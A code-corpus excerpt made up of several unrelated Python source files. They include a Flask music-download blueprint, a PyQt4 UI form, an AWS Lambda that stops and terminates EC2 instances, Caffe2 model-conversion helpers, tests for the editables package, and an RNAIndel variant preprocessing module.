from config import MUSIC_LOCATION
from flask import Blueprint, render_template, safe_join, request, redirect, send_from_directory
music_blueprint = Blueprint('music_blueprint', __name__, template_folder=os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'templates'), static_folder=os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'static'))
def get_youtube_music(url, directory):
youtube_dl_options = {
'format': 'bestaudio/best',
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3'
}],
'nocheckcertificate': True,
'outtmpl': os.path.join(directory, '%(title)s.%(ext)s')
}
try:
with youtube_dl.YoutubeDL(youtube_dl_options) as ydl:
ydl.download([url])
return True
except:
return False
@music_blueprint.route('/music/', methods=['GET'])
@authenticate
def get_music():
music = []
for root, dirs, files in os.walk(MUSIC_LOCATION):
music += [{'path': safe_join('/music', 'src', root.split(MUSIC_LOCATION)[-1], file), 'name': os.path.basename(os.path.splitext(file)[0])} for file in files if file.endswith('.mp3')]
return render_template('music/music.html', music=sorted(music, key=lambda k: k['name'])), 200
@music_blueprint.route('/music/', methods=['POST'])
@authenticate
def post_music():
if request.form.get('url'):
get_youtube_music(request.form.get('url'), os.path.join(MUSIC_LOCATION, 'download'))
return redirect('/music/'), 302
@music_blueprint.route('/music/src/<path:path>', methods=['GET'])
@authenticate
def get_music_source(path):
local_path = os.path.join(MUSIC_LOCATION, path)
if os.path.isfile(local_path):
directory, filename = os.path.split(local_path)
return send_from_directory(directory, filename)
return error_404(404)
|
StarcoderdataPython
|
176715
|
<reponame>specialforcea/labscript_suite
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'chipfpga.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName(_fromUtf8("Form"))
Form.resize(663, 635)
Form.setMaximumSize(QtCore.QSize(15777191, 16777215))
self.gridLayout = QtGui.QGridLayout(Form)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.scrollArea = QtGui.QScrollArea(Form)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName(_fromUtf8("scrollArea"))
self.scrollAreaWidgetContents_2 = QtGui.QWidget()
self.scrollAreaWidgetContents_2.setGeometry(QtCore.QRect(0, 0, 643, 310))
self.scrollAreaWidgetContents_2.setObjectName(_fromUtf8("scrollAreaWidgetContents_2"))
self.gridLayout_6 = QtGui.QGridLayout(self.scrollAreaWidgetContents_2)
self.gridLayout_6.setObjectName(_fromUtf8("gridLayout_6"))
self.tab = QtGui.QTabWidget(self.scrollAreaWidgetContents_2)
self.tab.setObjectName(_fromUtf8("tab"))
self.load_tab = QtGui.QWidget()
self.load_tab.setObjectName(_fromUtf8("load_tab"))
self.gridLayout_3 = QtGui.QGridLayout(self.load_tab)
self.gridLayout_3.setObjectName(_fromUtf8("gridLayout_3"))
self.load_table = QtGui.QTableWidget(self.load_tab)
self.load_table.setObjectName(_fromUtf8("load_table"))
self.load_table.setColumnCount(0)
self.load_table.setRowCount(0)
self.gridLayout_3.addWidget(self.load_table, 0, 0, 1, 1)
self.tab.addTab(self.load_tab, _fromUtf8(""))
self.read_table_tab = QtGui.QWidget()
self.read_table_tab.setObjectName(_fromUtf8("read_table_tab"))
self.gridLayout_2 = QtGui.QGridLayout(self.read_table_tab)
self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
self.read_table = QtGui.QTableWidget(self.read_table_tab)
self.read_table.setObjectName(_fromUtf8("read_table"))
self.read_table.setColumnCount(0)
self.read_table.setRowCount(0)
self.gridLayout_2.addWidget(self.read_table, 0, 0, 1, 1)
self.tab.addTab(self.read_table_tab, _fromUtf8(""))
self.read_graph_tab = QtGui.QWidget()
self.read_graph_tab.setObjectName(_fromUtf8("read_graph_tab"))
self.verticalLayout = QtGui.QVBoxLayout(self.read_graph_tab)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.read_graph = QtGui.QGraphicsView(self.read_graph_tab)
self.read_graph.setObjectName(_fromUtf8("read_graph"))
self.verticalLayout.addWidget(self.read_graph)
self.tab.addTab(self.read_graph_tab, _fromUtf8(""))
self.gridLayout_6.addWidget(self.tab, 0, 0, 1, 1)
self.scrollArea.setWidget(self.scrollAreaWidgetContents_2)
self.gridLayout.addWidget(self.scrollArea, 0, 1, 1, 1)
self.scrollArea_2 = QtGui.QScrollArea(Form)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.scrollArea_2.sizePolicy().hasHeightForWidth())
self.scrollArea_2.setSizePolicy(sizePolicy)
self.scrollArea_2.setWidgetResizable(True)
self.scrollArea_2.setObjectName(_fromUtf8("scrollArea_2"))
self.scrollAreaWidgetContents = QtGui.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 643, 297))
self.scrollAreaWidgetContents.setObjectName(_fromUtf8("scrollAreaWidgetContents"))
self.gridLayout_7 = QtGui.QGridLayout(self.scrollAreaWidgetContents)
self.gridLayout_7.setObjectName(_fromUtf8("gridLayout_7"))
self.file_dir_Edit = QtGui.QLineEdit(self.scrollAreaWidgetContents)
self.file_dir_Edit.setObjectName(_fromUtf8("file_dir_Edit"))
self.gridLayout_7.addWidget(self.file_dir_Edit, 1, 1, 1, 1)
self.read_status_edit = QtGui.QLineEdit(self.scrollAreaWidgetContents)
self.read_status_edit.setObjectName(_fromUtf8("read_status_edit"))
self.gridLayout_7.addWidget(self.read_status_edit, 3, 1, 1, 1)
self.byte_to_read_edit = QtGui.QLineEdit(self.scrollAreaWidgetContents)
self.byte_to_read_edit.setObjectName(_fromUtf8("byte_to_read_edit"))
self.gridLayout_7.addWidget(self.byte_to_read_edit, 5, 1, 1, 1)
self.Load_Button = QtGui.QPushButton(self.scrollAreaWidgetContents)
self.Load_Button.setObjectName(_fromUtf8("Load_Button"))
self.gridLayout_7.addWidget(self.Load_Button, 1, 0, 1, 1)
self.Write_Button = QtGui.QPushButton(self.scrollAreaWidgetContents)
self.Write_Button.setObjectName(_fromUtf8("Write_Button"))
self.gridLayout_7.addWidget(self.Write_Button, 3, 0, 1, 1)
self.write_status_edit = QtGui.QLineEdit(self.scrollAreaWidgetContents)
self.write_status_edit.setObjectName(_fromUtf8("write_status_edit"))
self.gridLayout_7.addWidget(self.write_status_edit, 5, 2, 1, 1)
self.Read_button = QtGui.QPushButton(self.scrollAreaWidgetContents)
self.Read_button.setObjectName(_fromUtf8("Read_button"))
self.gridLayout_7.addWidget(self.Read_button, 5, 0, 1, 1)
self.correct_button = QtGui.QPushButton(self.scrollAreaWidgetContents)
self.correct_button.setObjectName(_fromUtf8("correct_button"))
self.gridLayout_7.addWidget(self.correct_button, 7, 0, 1, 1)
self.correct_byte_edit = QtGui.QLineEdit(self.scrollAreaWidgetContents)
self.correct_byte_edit.setObjectName(_fromUtf8("correct_byte_edit"))
self.gridLayout_7.addWidget(self.correct_byte_edit, 7, 1, 1, 1)
self.write_status = QtGui.QLabel(self.scrollAreaWidgetContents)
self.write_status.setObjectName(_fromUtf8("write_status"))
self.gridLayout_7.addWidget(self.write_status, 2, 1, 1, 1, QtCore.Qt.AlignBottom)
self.read_status = QtGui.QLabel(self.scrollAreaWidgetContents)
self.read_status.setObjectName(_fromUtf8("read_status"))
self.gridLayout_7.addWidget(self.read_status, 4, 2, 1, 1, QtCore.Qt.AlignBottom)
self.table_dir = QtGui.QLabel(self.scrollAreaWidgetContents)
self.table_dir.setMaximumSize(QtCore.QSize(308, 48))
self.table_dir.setObjectName(_fromUtf8("table_dir"))
self.gridLayout_7.addWidget(self.table_dir, 0, 1, 1, 1, QtCore.Qt.AlignBottom)
self.correct_value_edit = QtGui.QLineEdit(self.scrollAreaWidgetContents)
self.correct_value_edit.setObjectName(_fromUtf8("correct_value_edit"))
self.gridLayout_7.addWidget(self.correct_value_edit, 7, 2, 1, 1)
self.bytes_to_read = QtGui.QLabel(self.scrollAreaWidgetContents)
self.bytes_to_read.setObjectName(_fromUtf8("bytes_to_read"))
self.gridLayout_7.addWidget(self.bytes_to_read, 4, 1, 1, 1, QtCore.Qt.AlignBottom)
self.correct_byte = QtGui.QLabel(self.scrollAreaWidgetContents)
self.correct_byte.setObjectName(_fromUtf8("correct_byte"))
self.gridLayout_7.addWidget(self.correct_byte, 6, 1, 1, 1, QtCore.Qt.AlignBottom)
self.corret_value = QtGui.QLabel(self.scrollAreaWidgetContents)
self.corret_value.setObjectName(_fromUtf8("corret_value"))
self.gridLayout_7.addWidget(self.corret_value, 6, 2, 1, 1, QtCore.Qt.AlignBottom)
self.Load_Button.raise_()
self.Load_Button.raise_()
self.Write_Button.raise_()
self.Read_button.raise_()
self.byte_to_read_edit.raise_()
self.read_status_edit.raise_()
self.file_dir_Edit.raise_()
self.correct_button.raise_()
self.correct_byte_edit.raise_()
self.correct_value_edit.raise_()
self.write_status_edit.raise_()
self.table_dir.raise_()
self.write_status.raise_()
self.read_status.raise_()
self.bytes_to_read.raise_()
self.correct_byte.raise_()
self.corret_value.raise_()
self.scrollArea_2.setWidget(self.scrollAreaWidgetContents)
self.gridLayout.addWidget(self.scrollArea_2, 1, 1, 1, 1)
self.retranslateUi(Form)
self.tab.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(_translate("Form", "Form", None))
self.tab.setTabText(self.tab.indexOf(self.load_tab), _translate("Form", "Loaded table", None))
self.tab.setTabText(self.tab.indexOf(self.read_table_tab), _translate("Form", "Read table", None))
self.tab.setTabText(self.tab.indexOf(self.read_graph_tab), _translate("Form", "Read graph", None))
self.Load_Button.setText(_translate("Form", "Load", None))
self.Write_Button.setText(_translate("Form", "Write", None))
self.Read_button.setText(_translate("Form", "Read", None))
self.correct_button.setText(_translate("Form", "Correct", None))
self.write_status.setText(_translate("Form", "Write status", None))
self.read_status.setText(_translate("Form", "Read status", None))
self.table_dir.setText(_translate("Form", "Table file directory", None))
self.bytes_to_read.setText(_translate("Form", "bytes to read", None))
self.correct_byte.setText(_translate("Form", "correct byte", None))
self.corret_value.setText(_translate("Form", "correct_value", None))
|
StarcoderdataPython
|
1653285
|
import json
import boto3
from time import sleep
from itertools import chain
client = boto3.client('ec2')
def list_instances(tags=None):
if tags is not None:
response = client.describe_instances(
Filters=[
{
'Name': 'tag:SubSystem',
'Values': tags
},
]
)
else:
response = client.describe_instances()
instance_list = list(
chain.from_iterable(
map(
lambda items: items['Instances'],
response['Reservations']
)
)
)
instances = list(
map(
lambda instance: instance['InstanceId'],
filter(
lambda instance: instance['State'] == 'pending' or instance['State']['Name'] == 'running',
instance_list
)
)
)
return instances
def stop_instances(instanceIds, sleep_in_sec=10):
stopping_instances = list(
map(
lambda instance: instance['InstanceId'],
client.stop_instances(
InstanceIds=instanceIds
)['StoppingInstances']
)
)
sleep(sleep_in_sec)
counter = 0
while counter < 6 and len(stopping_instances) <= 0:
response = client.describe_instances(
InstanceIds=stopping_instances
)
instances = list(
map(
lambda instance: instance['InstanceId'],
filter(
lambda instance: instance['State']['Name'] == 'pending' or instance['State']['Name'] == 'running' or instance['State']['Name'] == 'shutting-down',
chain.from_iterable(
map(
lambda items: items['Instances'],
response['Reservations']
)
)
)
)
)
if len(instances) > 0 and counter >= 3:
raise Exception('Maximum number of retries exceeded')
def terminate_instances(instances, sleep_in_sec=10):
terminating_instances = list(
map(
lambda instance: instance['InstanceId'],
client.terminate_instances(InstanceIds=instances)['TerminatingInstances']
)
)
sleep(sleep_in_sec)
counter = 0
while counter < 6 and len(terminating_instances) <= 0:
response = client.describe_instances(
InstanceIds=terminating_instances
)
terminating_instances = list(
map(
lambda instance: instance['InstanceId'],
filter(
lambda instance: instance['State']['Name'] != 'terminated',
chain.from_iterable(
map(
lambda items: items['Instances'],
response['Reservations']
)
)
)
)
)
if len(terminating_instances) > 0 and counter >= 3:
raise Exception('Maximum number of retries exceeded')
def sendResponse(success , statusCode , message , responseData):
return {
'success' : success,
'statusCode' : statusCode,
'message': message,
'responseData' : responseData
}
def handler(event, context):
try:
print('event: {0}'.format(json.dumps(event)))
# print('context: {0}'.format(json.dumps(context)))
if event['tags'] is not None:
tags = event['tags']
else:
tags = None
instances = list_instances(tags)
if len(instances) > 0:
stop_instances(instanceIds=instances)
print('Stopped instances')
terminate_instances(instances=instances)
print('Terminated instances')
return sendResponse(True, 200, 'Appointments found', '')
except Exception as error:
return sendResponse(False, 500, 'Error in fetch booked appointments', str(error))
|
StarcoderdataPython
|
1737011
|
# Copyright (c) 2017-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
'''Helper functions for model conversion to pb'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from functools import wraps
import copy
import numpy as np
from caffe2.python import core, workspace
from caffe2.proto import caffe2_pb2
class OpFilter(object):
def __init__(self, **kwargs):
self.type = None
self.type_in = None
self.inputs = None
self.outputs = None
self.input_has = None
self.output_has = None
self.cond = None
self.reverse = False
assert all([x in self.__dict__ for x in kwargs])
self.__dict__.update(kwargs)
def check(self, op):
ret = self.reverse
if self.type and op.type != self.type:
return ret
if self.type_in and op.type not in self.type_in:
return ret
if self.inputs and set(op.input) != set(self.inputs):
return ret
if self.outputs and set(op.output) != set(self.outputs):
return ret
if self.input_has and self.input_has not in op.input:
return ret
if self.output_has and self.output_has not in op.output:
return ret
if self.cond is not None and not self.cond:
return ret
return not ret
def filter_op(op, **kwargs):
''' Returns true if passed all checks '''
return OpFilter(**kwargs).check(op)
def op_filter(**filter_args):
''' Returns None if no condition is satisfied '''
def actual_decorator(f):
@wraps(f)
def wrapper(op, **params):
if not filter_op(op, **filter_args):
return None
return f(op, **params)
return wrapper
return actual_decorator
def op_func_chain(convert_func_list):
''' Run funcs one by one until func return is not None '''
assert isinstance(convert_func_list, list)
def _chain(op):
for x in convert_func_list:
ret = x(op)
if ret is not None:
return ret
return None
return _chain
def convert_op_in_ops(ops_ref, func_or_list):
func = func_or_list
if isinstance(func_or_list, list):
func = op_func_chain(func_or_list)
ops = [op for op in ops_ref]
converted_ops = []
for op in ops:
new_ops = func(op)
if new_ops is not None and not isinstance(new_ops, list):
new_ops = [new_ops]
converted_ops.extend(new_ops if new_ops is not None else [op])
del ops_ref[:]
# ops_ref maybe of type RepeatedCompositeFieldContainer
# which does not have append()
ops_ref.extend(converted_ops)
def convert_op_in_proto(proto, func_or_list):
convert_op_in_ops(proto.op, func_or_list)
def get_op_arg(op, arg_name):
for x in op.arg:
if x.name == arg_name:
return x
return None
def get_op_arg_valf(op, arg_name, default_val):
arg = get_op_arg(op, arg_name)
return arg.f if arg is not None else default_val
def update_mobile_engines(net):
for op in net.op:
if op.type == "Conv":
op.engine = "NNPACK"
if op.type == "ConvTranspose":
op.engine = "BLOCK"
def pairwise(iterable):
"s -> (s0,s1), (s1,s2), (s2, s3), ..."
from itertools import tee
a, b = tee(iterable)
next(b, None)
return zip(a, b)
def blob_uses(net, blob):
u = []
for i, op in enumerate(net.op):
if blob in op.input or blob in op.control_input:
u.append(i)
return u
def fuse_first_affine(net, params, removed_tensors):
net = copy.deepcopy(net)
params = copy.deepcopy(params)
for ((i, current), (j, next_)) in pairwise(enumerate(net.op)):
if next_.input[0] != current.output[0]:
continue
if current.type not in ("Conv", "ConvTranspose") \
or next_.type != "AffineChannel":
continue
if current.output[0] != next_.output[0] and \
len(blob_uses(net, current.output[0])) != 1:
# Can't fuse if more than one user unless AffineChannel is inplace
continue
# else, can fuse
conv = current
affine = next_
fused_conv = copy.deepcopy(conv)
fused_conv.output[0] = affine.output[0]
conv_weight = params[conv.input[1]]
conv_has_bias = len(conv.input) > 2
conv_bias = params[conv.input[2]] if conv_has_bias else 0
A = params[affine.input[1]]
B = params[affine.input[2]]
# Thus, can just have the affine transform
# X * A + B
# where
# A = bn_scale * 1.0 / (sqrt(running_var + eps))
# B = (bias - running_mean * (1.0 / sqrt(running_var + eps))
# * bn_scale)
# This identify should hold if we have correctly fused
# np.testing.assert_array_equal(
# params[conv.output[0]] * A + B,
# params[bn.output[0]])
# Now, we have that the computation made is the following:
# ((X `conv` W) + b) * A + B
# Then, we can simply fuse this as follows:
# (X `conv` (W * A)) + b * A + B
# which is simply
# (X `conv` Q) + C
# where
# Q = W * A
# C = b * A + B
# For ConvTranspose, from the view of convolutions as a
# Toepeliz multiplication, we have W_ = W^T, so the weights
# are laid out as (R, S, K, K) (vs (S, R, K, K) for a Conv),
# so the weights broadcast slightly differently. Remember, our
# BN scale 'B' is of size (S,)
A_ = A.reshape(-1, 1, 1, 1) if conv.type == "Conv" else \
A.reshape(1, -1, 1, 1)
C = conv_bias * A + B
Q = conv_weight * A_
assert params[conv.input[1]].shape == Q.shape
params[conv.input[1]] = Q
if conv_has_bias:
assert params[conv.input[2]].shape == C.shape
params[conv.input[2]] = C
else:
# make af_bias to be bias of the conv layer
fused_conv.input.append(affine.input[2])
params[affine.input[2]] = B
new_ops = net.op[:i] + [fused_conv] + net.op[j + 1:]
del net.op[:]
if conv_has_bias:
del params[affine.input[2]]
removed_tensors.append(affine.input[2])
removed_tensors.append(affine.input[1])
del params[affine.input[1]]
net.op.extend(new_ops)
break
return net, params, removed_tensors
def fuse_affine(net, params, ignore_failure):
# Run until we hit a fixed point
removed_tensors = []
while True:
(next_net, next_params, removed_tensors) = \
fuse_first_affine(net, params, removed_tensors)
if len(next_net.op) == len(net.op):
if (
any(op.type == "AffineChannel" for op in next_net.op) and
not ignore_failure
):
raise Exception(
"Model contains AffineChannel op after fusion: %s", next_net)
return (next_net, next_params, removed_tensors)
net, params, removed_tensors = (next_net, next_params, removed_tensors)
def fuse_net(fuse_func, net, blobs, ignore_failure=False):
is_core_net = isinstance(net, core.Net)
if is_core_net:
net = net.Proto()
net, params, removed_tensors = fuse_func(net, blobs, ignore_failure)
for rt in removed_tensors:
net.external_input.remove(rt)
if is_core_net:
net = core.Net(net)
return net, params
def fuse_net_affine(net, blobs):
return fuse_net(fuse_affine, net, blobs)
def add_tensor(net, name, blob):
''' Create an operator to store the tensor 'blob',
run the operator to put the blob to workspace.
uint8 is stored as an array of string with one element.
'''
kTypeNameMapper = {
np.dtype('float32'): "GivenTensorFill",
np.dtype('int32'): "GivenTensorIntFill",
np.dtype('int64'): "GivenTensorInt64Fill",
np.dtype('uint8'): "GivenTensorStringFill",
}
shape = blob.shape
values = blob
# pass array of uint8 as a string to save storage
# storing uint8_t has a large overhead for now
if blob.dtype == np.dtype('uint8'):
shape = [1]
values = [str(blob.data)]
op = core.CreateOperator(
kTypeNameMapper[blob.dtype],
[], [name],
shape=shape,
values=values,
# arg=[
# putils.MakeArgument("shape", shape),
# putils.MakeArgument("values", values),
# ]
)
net.op.extend([op])
def gen_init_net_from_blobs(blobs, blobs_to_use=None, excluded_blobs=None):
''' Generate an initialization net based on a blob dict '''
ret = caffe2_pb2.NetDef()
if blobs_to_use is None:
blobs_to_use = {x for x in blobs}
else:
blobs_to_use = copy.deepcopy(blobs_to_use)
if excluded_blobs is not None:
blobs_to_use = [x for x in blobs_to_use if x not in excluded_blobs]
for name in blobs_to_use:
blob = blobs[name]
if isinstance(blob, str):
print('Blob {} with type {} is not supported in generating init net,'
' skipped.'.format(name, type(blob)))
continue
add_tensor(ret, name, blob)
return ret
def get_ws_blobs(blob_names=None):
''' Get blobs in 'blob_names' in the default workspace,
get all blobs if blob_names is None '''
blobs = {}
if blob_names is None:
blob_names = workspace.Blobs()
blobs = {x: workspace.FetchBlob(x) for x in blob_names}
return blobs
def get_device_option_cpu():
device_option = core.DeviceOption(caffe2_pb2.CPU)
return device_option
def get_device_option_cuda(gpu_id=0):
device_option = caffe2_pb2.DeviceOption()
device_option.device_type = caffe2_pb2.CUDA
device_option.device_id = gpu_id
return device_option
def create_input_blobs_for_net(net_def):
for op in net_def.op:
for blob_in in op.input:
if not workspace.HasBlob(blob_in):
workspace.CreateBlob(blob_in)
def compare_model(model1_func, model2_func, test_image, check_blobs):
''' model_func(test_image, check_blobs)
'''
cb1, cb2 = check_blobs, check_blobs
if isinstance(check_blobs, dict):
cb1 = check_blobs.keys()
cb2 = check_blobs.values()
print('Running the first model...')
res1 = model1_func(test_image, check_blobs)
print('Running the second model...')
res2 = model2_func(test_image, check_blobs)
for idx in range(len(cb1)):
print('Checking {} -> {}...'.format(cb1[idx], cb2[idx]))
n1, n2 = cb1[idx], cb2[idx]
r1 = res1[n1] if n1 in res1 else None
r2 = res2[n2] if n2 in res2 else None
assert r1 is not None or r2 is None, \
"Blob {} in model1 is None".format(n1)
assert r2 is not None or r1 is None, \
"Blob {} in model2 is None".format(n2)
assert r1.shape == r2.shape, \
"Blob {} and {} shape mismatched: {} vs {}".format(
n1, n2, r1.shape, r2.shape)
np.testing.assert_array_almost_equal(
r1, r2, decimal=3,
err_msg='{} and {} not matched. Max diff: {}'.format(
n1, n2, np.amax(np.absolute(r1 - r2))))
return True
# graph_name could not contain word 'graph'
def save_graph(net, file_name, graph_name="net", op_only=True):
from caffe2.python import net_drawer
graph = None
ops = net.op
if not op_only:
graph = net_drawer.GetPydotGraph(
ops, graph_name,
rankdir="TB")
else:
graph = net_drawer.GetPydotGraphMinimal(
ops, graph_name,
rankdir="TB", minimal_dependency=True)
try:
graph.write_png(file_name)
except Exception as e:
print('Error when writing graph to image {}'.format(e))
|
StarcoderdataPython
|
1674168
|
<gh_stars>0
import subprocess
import pytest
import virtualenv
from editables import build_editable
def make_venv(name):
return virtualenv.cli_run([str(name), "--without-pip"])
def run(*args):
return subprocess.run(
[str(a) for a in args],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
check=True,
universal_newlines=True,
)
def build_project(target, structure):
target.mkdir(exist_ok=True, parents=True)
for name, content in structure.items():
path = target / name
if isinstance(content, str):
path.write_text(content, encoding="utf-8")
else:
build_project(path, content)
@pytest.fixture
def project(tmp_path):
project = tmp_path / "project"
structure = {
"foo": {
"__init__.py": "print('foo')",
"bar": {"__init__.py": "print('foo.bar')"},
"baz": {"__init__.py": "print('foo.baz')"},
}
}
build_project(project, structure)
yield project
def test_returns_right_files(project):
files = [f for f, src in build_editable(project)]
assert files == ["foo.py"]
files = {f for f, src in build_editable(project / "foo")}
assert files == {"bar.py", "baz.py"}
@pytest.mark.parametrize(
"expose,hide", [(None, None), (None, ["foo.bar"]), ("foo", ["foo.bar", "foo.baz"])]
)
def test_hook_vars(project, expose, hide):
filename, src = next(build_editable(project, expose=expose, hide=hide))
# Remove the line that runs the bootstrap
src = "\n".join(line for line in src.splitlines() if line != "_bootstrap()")
global_dict = {"__builtins__": __builtins__}
exec(src, global_dict)
assert global_dict["location"] == str(project), str(src)
assert set(global_dict["excludes"]) == set(hide or []), str(src)
def test_editable_expose_hide(tmp_path, project):
# install to a virtual environment
result = make_venv(tmp_path / "venv")
for name, code in build_editable(project, expose=["foo"], hide=["foo.bar"]):
(result.creator.purelib / name).write_text(code, encoding="utf-8")
# test it works
run(result.creator.exe, "-c", "import foo; print(foo)")
with pytest.raises(subprocess.CalledProcessError):
ret = run(result.creator.exe, "-c", "import foo.bar")
assert "foo.bar is excluded from packaging" in ret.stderr
def test_editable_hide_none(tmp_path, project):
# install to a virtual environment
result = make_venv(tmp_path / "venv")
for name, code in build_editable(project, expose=["foo"]):
(result.creator.purelib / name).write_text(code)
# test that both foo and foo.bar are exposed
run(result.creator.exe, "-c", "import foo; print(foo)")
run(result.creator.exe, "-c", "import foo.bar; print(foo.bar)")
def test_editable_defaults(tmp_path, project):
# install to a virtual environment
result = make_venv(tmp_path / "venv")
for name, code in build_editable(project):
(result.creator.purelib / name).write_text(code)
# test that both foo and foo.bar are exposed
run(result.creator.exe, "-c", "import foo; print(foo)")
run(result.creator.exe, "-c", "import foo.bar; print(foo.bar)")
|
StarcoderdataPython
|
112843
|
<filename>rnaindel/analysis/preprocessor.py
import os
import csv
import pysam
import pandas as pd
from functools import partial
from multiprocessing import Pool
from indelpost import Variant, VariantAlignment
from .callset_formatter import format_callset
from .coding_indel import annotate_coding_info
from .transcript_feature_calculator import transcript_features
from .alignment_feature_calculator import alignment_features
from .database_feature_calculator import database_features
CANONICALS = [str(i) for i in range(1, 23)] + ["X", "Y"]
def preprocess(
tmp_dir,
fasta_file,
bam_file,
data_dir,
mapq,
num_of_processes,
region,
external_vcf,
pass_only,
):
if num_of_processes == 1:
callset = format_callset(tmp_dir, external_vcf, pass_only, region)
df = calculate_features(
callset, fasta_file, bam_file, data_dir, mapq, external_vcf
)
else:
callsets_by_chrom = format_callset(tmp_dir, external_vcf, pass_only, region)
pool = Pool(num_of_processes)
dfs = pool.map(
partial(
calculate_features,
fasta_file=fasta_file,
bam_file=bam_file,
data_dir=data_dir,
mapq=mapq,
external_vcf=external_vcf,
),
callsets_by_chrom,
)
df = pd.concat(dfs)
return df
def calculate_features(callset, fasta_file, bam_file, data_dir, mapq, external_vcf):
path_to_coding_gene_db = "{}/refgene/refCodingExon.bed.gz".format(data_dir)
path_to_proteindb = "{}/protein/proteinConservedDomains.txt".format(data_dir)
path_to_dbsnp = "{}/dbsnp/dbsnp.indel.vcf.gz".format(data_dir)
path_to_clinvar = "{}/clinvar/clinvar.indel.vcf.gz".format(data_dir)
path_to_cosmic = "{}/cosmic/CosmicCodingMuts.indel.vcf.gz".format(data_dir)
df = filter_non_coding_indels(
callset, fasta_file, path_to_coding_gene_db, external_vcf
)
if len(df) > 0:
df = transcript_features(df, path_to_proteindb)
df = alignment_features(df, bam_file, mapq)
if len(df) > 0:
return database_features(df, path_to_dbsnp, path_to_clinvar, path_to_cosmic)
return make_empty_df()
def filter_non_coding_indels(callset, fasta_file, path_to_coding_gene_db, external_vcf):
reference = pysam.FastaFile(fasta_file)
coding_gene_db = pysam.TabixFile(path_to_coding_gene_db)
coding_indels = []
is_prefixed = reference.references[0].startswith("chr")
with open(callset) as f:
records = csv.DictReader(f, delimiter="\t")
for record in records:
try:
indel, origin = bambino2variant(record, reference, is_prefixed)
update_coding_indels(coding_indels, indel, origin, coding_gene_db)
except:
pass
if coding_indels:
df = pd.DataFrame(coding_indels)
if external_vcf:
dfg = df.groupby(["chrom", "pos", "ref", "alt"])
df = dfg.apply(summarize_caller_origin)
df = df.drop_duplicates(subset=["chrom", "pos", "ref", "alt", "origin"])
return df
else:
header = ["empty"]
return pd.DataFrame(columns=header)
def update_coding_indels(coding_indels, indel, origin, coding_gene_db):
coding_annotations = annotate_coding_info(indel, coding_gene_db)
if coding_annotations:
d = {
"indel": indel,
"chrom": indel.chrom,
"pos": indel.pos,
"ref": indel.ref,
"alt": indel.alt,
"coding_indel_isoforms": coding_annotations,
"origin": origin,
}
coding_indels.append(d)
def summarize_caller_origin(df_groupedby_indel):
origins = set(df_groupedby_indel["origin"].to_list())
if len(origins) > 1:
df_groupedby_indel["origin"] = "both"
return df_groupedby_indel
def bambino2variant(record, reference, is_prefixed):
chrom = record["Chr"].replace("chr", "")
if not chrom in CANONICALS:
return None
chrom = "chr" + chrom if is_prefixed else chrom
pos = int(record["Pos"])
ref = record["Chr_Allele"]
alt = record["Alternative_Allele"]
var_type = record["Type"]
origin = "external"
if var_type in ["deletion", "insertion"]:
origin = "built_in"
pos -= 1
padding_base = reference.fetch(chrom, pos - 1, pos)
if var_type == "deletion":
alt = padding_base
ref = alt + ref
else:
ref = padding_base
alt = ref + alt
return Variant(chrom, pos, ref, alt, reference).normalize(), origin
def make_empty_df():
header = [
"indel",
"origin",
"chrom",
"pos",
"ref",
"alt",
"annotation",
"cds_length",
"indel_location",
"is_inframe",
"is_splice",
"is_truncating",
"is_nmd_insensitive",
"is_in_cdd",
"gene_symbol",
"ipg",
"repeat",
"lc",
"local_lc",
"gc",
"local_gc",
"strength",
"local_strength",
"dissimilarity",
"indel_complexity",
"indel_size",
"is_ins",
"is_at_ins",
"is_at_del",
"is_gc_ins",
"is_gc_del",
"ref_count",
"alt_count",
"orig_ref_cnt",
"orig_alt_cnt",
"is_bidirectional",
"is_uniq_mapped",
"uniq_mapping_rate",
"is_near_boundary",
"equivalence_exists",
"is_multiallelic",
"cplx_variant",
"dbsnp",
"pop_freq",
"is_common",
"is_on_db",
"is_pathogenic",
"cosmic_cnt",
]
return pd.DataFrame(columns=header)
|
StarcoderdataPython
|
1759731
|
<reponame>Sokrates80/air-py
"""
airPy is a flight controller based on pyboard and written in micropython.
The MIT License (MIT)
Copyright (c) 2016 <NAME>, <EMAIL>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
